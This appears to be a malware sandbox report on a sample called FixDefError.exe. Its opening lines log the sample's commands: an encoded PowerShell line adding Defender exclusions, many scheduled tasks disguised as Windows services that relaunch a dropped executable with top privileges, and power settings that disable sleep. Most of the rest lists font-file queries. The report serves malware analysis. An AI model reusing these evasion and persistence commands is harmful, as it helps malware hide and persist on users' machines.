Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Users\user\Desktop\FixDefError.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
